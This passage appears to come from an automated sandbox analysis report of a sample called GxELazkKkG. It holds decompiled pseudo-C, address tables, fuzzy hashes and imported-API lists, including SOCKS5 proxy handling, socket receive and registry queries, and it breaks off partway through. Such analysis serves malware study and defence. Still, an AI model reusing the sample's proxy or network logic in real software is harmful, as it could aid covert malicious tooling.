                                                                          										_t76 =  *((intOrPtr*)(_v24 + 0x28));
                                                                          										goto __ecx;
                                                                          									}
                                                                          									L14:
                                                                          									return _t43;
                                                                          								} else {
                                                                          									if(_t47 == 8) {
                                                                          										goto L5;
                                                                          									} else {
                                                                          										goto L13;
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					if( *((intOrPtr*)(_t37 + 0x30)) < 0) {
                                                                          						L18:
                                                                          						E0040B3B0(_t58, _t74);
                                                                          						_t37 =  *0x418284;
                                                                          					}
                                                                          				}
                                                                          				L2:
                                                                          				if( *((intOrPtr*)(_t37 + 0x30)) != 0) {
                                                                          					_t39 = GetLastError();
                                                                          					 *_t76 =  *((intOrPtr*)(_t37 + 0x2c));
                                                                          					_t74 = _t39;
                                                                          					_t40 = TlsGetValue(??);
                                                                          					_t77 = _t76 - 4;
                                                                          					 *_t77 = _t39;
                                                                          					SetLastError(??);
                                                                          					_t41 = _t40;
                                                                          					_t76 = _t77 - 4;
                                                                          				} else {
                                                                          					_t41 =  *(_t37 + 0x28);
                                                                          				}
                                                                          				_v20 = _t41;
                                                                          				_t61 =  &_v24;
                                                                          				_v24 = _t41;
                                                                          				goto L6;
                                                                          			}



























                                                                          0x0040b749
                                                                          0x0040b74e
                                                                          0x0040b753
                                                                          0x0040b81c
                                                                          0x0040b821
                                                                          0x0040b82b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040b798
                                                                          0x0040b79b
                                                                          0x0040b7ef
                                                                          0x0040b79d
                                                                          0x0040b79f
                                                                          0x0040b7d6
                                                                          0x0040b7d6
                                                                          0x00000000
                                                                          0x0040b7a1
                                                                          0x0040b7a3
                                                                          0x0040b780
                                                                          0x0040b783
                                                                          0x0040b785
                                                                          0x0040b788
                                                                          0x0040b788
                                                                          0x0040b788
                                                                          0x0040b78c
                                                                          0x0040b791
                                                                          0x0040b793
                                                                          0x0040b796
                                                                          0x0040b796
                                                                          0x00000000
                                                                          0x0040b791
                                                                          0x0040b7a5
                                                                          0x0040b7a5
                                                                          0x0040b7a9
                                                                          0x0040b7b2
                                                                          0x0040b7b9
                                                                          0x0040b7c2
                                                                          0x0040b7c6
                                                                          0x0040b7ca
                                                                          0x0040b7cf
                                                                          0x0040b840
                                                                          0x0040b84c
                                                                          0x0040b852
                                                                          0x0040b857
                                                                          0x0040b85f
                                                                          0x0040b865
                                                                          0x0040b86a
                                                                          0x0040b86f
                                                                          0x0040b893
                                                                          0x0040b898
                                                                          0x0040b898
                                                                          0x0040b876
                                                                          0x0040b8be
                                                                          0x0040b8c3
                                                                          0x0040b8c3
                                                                          0x0040b878
                                                                          0x0040b87d
                                                                          0x0040b8a2
                                                                          0x0040b8a6
                                                                          0x0040b8b4
                                                                          0x0040b8b6
                                                                          0x0040b8b6
                                                                          0x0040b87f
                                                                          0x0040b87f
                                                                          0x0040b87f
                                                                          0x0040b882
                                                                          0x0040b88e
                                                                          0x0040b891
                                                                          0x0040b891
                                                                          0x0040b7db
                                                                          0x0040b7e2
                                                                          0x0040b7d1
                                                                          0x0040b7d4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040b7d4
                                                                          0x0040b7cf
                                                                          0x0040b7a3
                                                                          0x0040b79f
                                                                          0x0040b759
                                                                          0x0040b75e
                                                                          0x0040b831
                                                                          0x0040b831
                                                                          0x0040b836
                                                                          0x0040b836
                                                                          0x0040b75e
                                                                          0x0040b764
                                                                          0x0040b769
                                                                          0x0040b7f3
                                                                          0x0040b7f9
                                                                          0x0040b7fc
                                                                          0x0040b7fe
                                                                          0x0040b804
                                                                          0x0040b809
                                                                          0x0040b80c
                                                                          0x0040b812
                                                                          0x0040b814
                                                                          0x0040b76f
                                                                          0x0040b76f
                                                                          0x0040b76f
                                                                          0x0040b772
                                                                          0x0040b775
                                                                          0x0040b778
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 93a37cc761da05d28123ec6793a1aa2a7504f56957f8d3d69b3e88f2f85eb7ef
                                                                          • Instruction ID: 45d732202371662b8addf3eaaaff00240ebc5fc11857fefe16626fd26bfd471c
                                                                          • Opcode Fuzzy Hash: 93a37cc761da05d28123ec6793a1aa2a7504f56957f8d3d69b3e88f2f85eb7ef
                                                                          • Instruction Fuzzy Hash: C4413A75A002058FCB44EF69D684A6AB7F5FB88310F15857ED805AB3A1D738ED01CBDA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 64%
                                                                          			E0040B9C0(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				intOrPtr _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v16;
                                                                          				void* _v20;
                                                                          				void* _v24;
                                                                          				intOrPtr _v40;
                                                                          				intOrPtr _t39;
                                                                          				long _t41;
                                                                          				void* _t42;
                                                                          				void* _t43;
                                                                          				void* _t47;
                                                                          				void* _t54;
                                                                          				void* _t64;
                                                                          				intOrPtr _t73;
                                                                          				intOrPtr* _t79;
                                                                          				long* _t80;
                                                                          
                                                                          				_t59 = __ebx;
                                                                          				_v8 = __edi;
                                                                          				_t73 = _a4;
                                                                          				_v16 = __ebx;
                                                                          				_v12 = __esi;
                                                                          				_t39 =  *0x418284;
                                                                          				if(_t39 == 0) {
                                                                          					E0040B0E0(_t39);
                                                                          					_t39 =  *0x418284;
                                                                          					_t76 =  *(_t39 + 0x30);
                                                                          					if( *(_t39 + 0x30) >= 0) {
                                                                          						L2:
                                                                          						if( *(_t39 + 0x30) != 0) {
                                                                          							L9:
                                                                          							_t41 = GetLastError();
                                                                          							 *_t79 =  *((intOrPtr*)(_t39 + 0x2c));
                                                                          							_t76 = _t41;
                                                                          							_t42 = TlsGetValue(??);
                                                                          							_t80 = _t79 - 4;
                                                                          							 *_t80 = _t41;
                                                                          							SetLastError(??);
                                                                          							_t43 = _t42;
                                                                          							_v20 = _t43;
                                                                          							_v24 = _t43;
                                                                          							_t79 = _t80 - 4;
                                                                          							 *((intOrPtr*)(_t73 + 0xc)) = _a8;
                                                                          							 *((intOrPtr*)(_t73 + 0x10)) = _a12;
                                                                          							_t47 = E0040B8D0(_t73,  &_v24);
                                                                          							if(_t47 != 7) {
                                                                          								L4:
                                                                          								return _t47;
                                                                          							}
                                                                          							L11:
                                                                          							_t48 =  *0x418284;
                                                                          							_t64 = _v24;
                                                                          							if(_t48 == 0) {
                                                                          								E0040B0E0(_t48);
                                                                          								_t48 =  *0x418284;
                                                                          							}
                                                                          							if( *((intOrPtr*)(_t48 + 0x30)) < 0) {
                                                                          								E0040B3B0(_t64, _t76);
                                                                          								_t48 =  *0x418284;
                                                                          							}
                                                                          							if( *((intOrPtr*)(_t48 + 0x30)) != 0) {
                                                                          								_v40 = _t64;
                                                                          								 *_t79 =  *((intOrPtr*)(_t48 + 0x2c));
                                                                          								if(TlsSetValue(??, ??) == 0) {
                                                                          									GetLastError();
                                                                          								}
                                                                          							} else {
                                                                          								 *((intOrPtr*)(_t48 + 0x28)) = _t64;
                                                                          							}
                                                                          							_t48 = _v24;
                                                                          							_t79 =  *((intOrPtr*)(_v24 + 0x28));
                                                                          							goto __ecx;
                                                                          						}
                                                                          						L3:
                                                                          						_t54 =  *(_t39 + 0x28);
                                                                          						_v20 = _t54;
                                                                          						_v24 = _t54;
                                                                          						 *((intOrPtr*)(_t73 + 0xc)) = _a8;
                                                                          						 *((intOrPtr*)(_t73 + 0x10)) = _a12;
                                                                          						_t47 = E0040B8D0(_t73,  &_v24);
                                                                          						if(_t47 == 7) {
                                                                          							goto L11;
                                                                          						}
                                                                          						goto L4;
                                                                          					}
                                                                          					L7:
                                                                          					E0040B3B0(_t59, _t76);
                                                                          					_t39 =  *0x418284;
                                                                          					if( *(_t39 + 0x30) == 0) {
                                                                          						goto L3;
                                                                          					}
                                                                          					goto L9;
                                                                          				}
                                                                          				_t76 =  *(_t39 + 0x30);
                                                                          				if( *(_t39 + 0x30) < 0) {
                                                                          					goto L7;
                                                                          				}
                                                                          				goto L2;
                                                                          			}



















                                                                          0x0040b9c0
                                                                          0x0040b9c6
                                                                          0x0040b9c9
                                                                          0x0040b9cc
                                                                          0x0040b9cf
                                                                          0x0040b9d2
                                                                          0x0040b9d9
                                                                          0x0040ba20
                                                                          0x0040ba25
                                                                          0x0040ba2a
                                                                          0x0040ba2f
                                                                          0x0040b9e2
                                                                          0x0040b9e7
                                                                          0x0040ba60
                                                                          0x0040ba63
                                                                          0x0040ba69
                                                                          0x0040ba6c
                                                                          0x0040ba6e
                                                                          0x0040ba74
                                                                          0x0040ba79
                                                                          0x0040ba7c
                                                                          0x0040ba82
                                                                          0x0040ba87
                                                                          0x0040ba8a
                                                                          0x0040ba90
                                                                          0x0040ba93
                                                                          0x0040ba99
                                                                          0x0040ba9e
                                                                          0x0040baa6
                                                                          0x0040ba11
                                                                          0x0040ba1d
                                                                          0x0040ba1d
                                                                          0x0040bab0
                                                                          0x0040bab0
                                                                          0x0040bab5
                                                                          0x0040baba
                                                                          0x0040bafd
                                                                          0x0040bb02
                                                                          0x0040bb02
                                                                          0x0040bac1
                                                                          0x0040bb09
                                                                          0x0040bb0e
                                                                          0x0040bb0e
                                                                          0x0040bac8
                                                                          0x0040bae1
                                                                          0x0040bae5
                                                                          0x0040baf3
                                                                          0x0040baf5
                                                                          0x0040baf5
                                                                          0x0040baca
                                                                          0x0040baca
                                                                          0x0040baca
                                                                          0x0040bacd
                                                                          0x0040bad9
                                                                          0x0040badc
                                                                          0x0040badc
                                                                          0x0040b9e9
                                                                          0x0040b9e9
                                                                          0x0040b9ef
                                                                          0x0040b9f2
                                                                          0x0040b9f8
                                                                          0x0040b9fe
                                                                          0x0040ba03
                                                                          0x0040ba0b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040ba0b
                                                                          0x0040ba40
                                                                          0x0040ba40
                                                                          0x0040ba45
                                                                          0x0040ba4f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040ba51
                                                                          0x0040b9db
                                                                          0x0040b9e0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$Value
                                                                          • String ID:
                                                                          • API String ID: 1883355122-0
                                                                          • Opcode ID: 76128aff822269898b8914e3844feebccba58d7589f724bc458a13517587ad4f
                                                                          • Instruction ID: 23407aeb104a5e4d22db15432d45e4df2a3b4d44022ab58e5814b8ef13b66587
                                                                          • Opcode Fuzzy Hash: 76128aff822269898b8914e3844feebccba58d7589f724bc458a13517587ad4f
                                                                          • Instruction Fuzzy Hash: A341F8B4B006198FCB50DF69D58099ABBF4FF08310B1585BAD919AB351E734AD00CFDA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcat.KERNEL32 ref: 00402E21
                                                                          • lstrcat.KERNEL32 ref: 00402E3B
                                                                            • Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
                                                                            • Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
                                                                            • Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5
                                                                          • lstrcat.KERNEL32 ref: 00402E63
                                                                          • lstrcat.KERNEL32 ref: 00402E85
                                                                          • Sleep.KERNEL32 ref: 00402EC5
                                                                          • lstrcat.KERNEL32 ref: 00402EAA
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
                                                                          • String ID:
                                                                          • API String ID: 1562643418-0
                                                                          • Opcode ID: a1067839a208299eab76daf55394ac3ec8733fb75f3d0707a547c42b76d0ecf2
                                                                          • Instruction ID: f63abfe6bd6a6f6ba5da5a44fc92895626e452bfcf87627a9a73b7892de61845
                                                                          • Opcode Fuzzy Hash: a1067839a208299eab76daf55394ac3ec8733fb75f3d0707a547c42b76d0ecf2
                                                                          • Instruction Fuzzy Hash: 0021ECB59143048BCB10EF64D9816DEBBF0EF84314F40897FE584A3281EB389698CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 19%
                                                                          			E10001BBE(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, short* _a8) {
                                                                          				intOrPtr _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v16;
                                                                          				signed int _v17;
                                                                          				void* _v36;
                                                                          				short* _v40;
                                                                          				void* _t27;
                                                                          				signed int _t28;
                                                                          				void* _t33;
                                                                          				void* _t38;
                                                                          				signed int _t42;
                                                                          				void* _t43;
                                                                          				intOrPtr _t46;
                                                                          				short* _t49;
                                                                          				intOrPtr* _t51;
                                                                          
                                                                          				_v16 = __ebx;
                                                                          				_v12 = __esi;
                                                                          				_v8 = __edi;
                                                                          				_t46 = _a4;
                                                                          				_t49 = _a8;
                                                                          				_v17 = 0xff;
                                                                          				_v36 = 2;
                                                                          				_v40 = _t49;
                                                                          				 *_t51 = _t46;
                                                                          				_t28 = E1000128D(_t27);
                                                                          				_t43 = 0;
                                                                          				if(_t28 == 0) {
                                                                          					L9:
                                                                          					return _t43;
                                                                          				}
                                                                          				_t42 =  *(_t49 + 1) & 0x000000ff;
                                                                          				_t43 = 0;
                                                                          				if(((_t28 & 0xffffff00 |  *_t49 != 0x00000005 | 0 | _t42 == 0x00000000) & 0x00000001) != 0) {
                                                                          					goto L9;
                                                                          				}
                                                                          				_v36 = _t42;
                                                                          				_v40 = _t49;
                                                                          				 *_t51 = _t46;
                                                                          				_t33 = E1000128D(_t42);
                                                                          				_t43 = 0;
                                                                          				if(_t33 == 0) {
                                                                          					goto L9;
                                                                          				}
                                                                          				while(1) {
                                                                          					_t42 = _t42 - 1;
                                                                          					if( *((char*)(_t49 + _t42)) == 2) {
                                                                          						break;
                                                                          					}
                                                                          					if(_t42 > 0) {
                                                                          						continue;
                                                                          					}
                                                                          					L7:
                                                                          					 *_t49 = _v17 << 0x00000008 | 0x00000005;
                                                                          					_v36 = 2;
                                                                          					_v40 = _t49;
                                                                          					 *_t51 = _t46;
                                                                          					_t38 = E10001236(_v17 << 0x00000008 | 0x00000005);
                                                                          					_t43 = 0;
                                                                          					if(_t38 != 0) {
                                                                          						_v40 = _t49;
                                                                          						 *_t51 = _t46;
                                                                          						_t43 = E10001A5B(_t42, _t46, _t49);
                                                                          					}
                                                                          					goto L9;
                                                                          				}
                                                                          				_v17 = 2;
                                                                          				goto L7;
                                                                          			}


















                                                                          0x10001bc4
                                                                          0x10001bc7
                                                                          0x10001bca
                                                                          0x10001bcd
                                                                          0x10001bd0
                                                                          0x10001bd3
                                                                          0x10001bd7
                                                                          0x10001bdf
                                                                          0x10001be3
                                                                          0x10001be6
                                                                          0x10001beb
                                                                          0x10001bf2
                                                                          0x10001c7d
                                                                          0x10001c8b
                                                                          0x10001c8b
                                                                          0x10001bf8
                                                                          0x10001c09
                                                                          0x10001c10
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001c15
                                                                          0x10001c19
                                                                          0x10001c1d
                                                                          0x10001c20
                                                                          0x10001c25
                                                                          0x10001c2c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001c36
                                                                          0x10001c36
                                                                          0x10001c3f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001c43
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x10001c45
                                                                          0x10001c4f
                                                                          0x10001c52
                                                                          0x10001c5a
                                                                          0x10001c5e
                                                                          0x10001c61
                                                                          0x10001c66
                                                                          0x10001c6d
                                                                          0x10001c6f
                                                                          0x10001c73
                                                                          0x10001c7b
                                                                          0x10001c7b
                                                                          0x00000000
                                                                          0x10001c6d
                                                                          0x10001c30
                                                                          0x00000000

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: sread$AuthSocks5swrite
                                                                          • String ID:
                                                                          • API String ID: 805060314-0
                                                                          • Opcode ID: 4e1afb2cb86adeb6528c9470966f2de77a63b8daad39af29b91a50e78bb70aaa
                                                                          • Instruction ID: 0b9e80be15c953b71f1d55b714f5562b534450c719e0e795439118d94a9aa7db
                                                                          • Opcode Fuzzy Hash: 4e1afb2cb86adeb6528c9470966f2de77a63b8daad39af29b91a50e78bb70aaa
                                                                          • Instruction Fuzzy Hash: BA219D70948754ABF710CF6881803AEFBE9EF84280F15C44AE8D897285D374DA42CB42
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040428B), ref: 0040484C
                                                                          • RegOpenKeyExA.ADVAPI32 ref: 0040487A
                                                                          • RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004048B5
                                                                          • RegCloseKey.ADVAPI32 ref: 004048C5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Open$CloseQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3546245721-0
                                                                          • Opcode ID: 29f9e6147c9e0dbab374f9f7d1eee4296a4e52f03c6ec6fd140c1b1f9b0e3caf
                                                                          • Instruction ID: 49bf87151660670d78cfdeefb83c057e4f3b6f757f6147e457b2a6993822bbc7
                                                                          • Opcode Fuzzy Hash: 29f9e6147c9e0dbab374f9f7d1eee4296a4e52f03c6ec6fd140c1b1f9b0e3caf
                                                                          • Instruction Fuzzy Hash: 0D21C8F49043099FDB00EF69C18575EBBF4BB48348F40892EE998A7341E378DA488B52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E004067E0(void* __ebx, signed int _a4) {
                                                                          				void* _v8;
                                                                          				char _v1036;
                                                                          				signed int _v1040;
                                                                          				intOrPtr _v1044;
                                                                          				signed int _v1048;
                                                                          				signed int _t13;
                                                                          				signed int _t20;
                                                                          				signed int _t22;
                                                                          				void* _t23;
                                                                          				signed int* _t24;
                                                                          				intOrPtr* _t25;
                                                                          
                                                                          				_t24 = _t23 - 0x414;
                                                                          				_t20 =  &_v1036;
                                                                          				_v1044 = 0x400;
                                                                          				_v1048 = 0;
                                                                          				 *_t24 = _t20;
                                                                          				memset(__ebx, ??, ??);
                                                                          				_v1040 = 0;
                                                                          				_v1044 = 0x400;
                                                                          				_v1048 = _t20;
                                                                          				_t13 = _a4;
                                                                          				 *_t24 = _t13;
                                                                          				L004086B8();
                                                                          				_t25 = _t24 - 0x10;
                                                                          				_t22 = 0;
                                                                          				if(_t13 + 1 > 1) {
                                                                          					 *_t25 =  &_v1036;
                                                                          					_t22 = (E00406856( &_v1036, _t20) & 0xffffff00 | _t17 - 0x00000190 < 0x00000000) & 0x000000ff;
                                                                          				}
                                                                          				return _t22;
                                                                          			}














                                                                          0x004067e4
                                                                          0x004067ea
                                                                          0x004067f0
                                                                          0x004067f8
                                                                          0x00406800
                                                                          0x00406803
                                                                          0x00406808
                                                                          0x00406810
                                                                          0x00406818
                                                                          0x0040681c
                                                                          0x0040681f
                                                                          0x00406822
                                                                          0x00406827
                                                                          0x0040682b
                                                                          0x00406833
                                                                          0x0040683b
                                                                          0x0040684b
                                                                          0x0040684b
                                                                          0x00406854

                                                                          APIs
                                                                          • memset.MSVCRT ref: 00406803
                                                                          • recv.WS2_32 ref: 00406822
                                                                            • Part of subcall function 00406856: lstrlen.KERNEL32(?,?,?), ref: 0040686A
                                                                            • Part of subcall function 00406856: sscanf.MSVCRT ref: 0040688E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlenmemsetrecvsscanf
                                                                          • String ID: fc@
                                                                          • API String ID: 2556557004-2333546356
                                                                          • Opcode ID: c1133dbf17f94d7c7e6c6e6ca5dd0c921707f1a6a51cd10e35ba8147b46d26d8
                                                                          • Instruction ID: 7b1cb7ca667fa739690624300255a696f657d489af5130fe59f4ce6b6cdf8f5c
                                                                          • Opcode Fuzzy Hash: c1133dbf17f94d7c7e6c6e6ca5dd0c921707f1a6a51cd10e35ba8147b46d26d8
                                                                          • Instruction Fuzzy Hash: CBF01DB05043049EDB00FF25C58535EBBE4AB44348F51886DE6C8A7382D638D5898B56
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
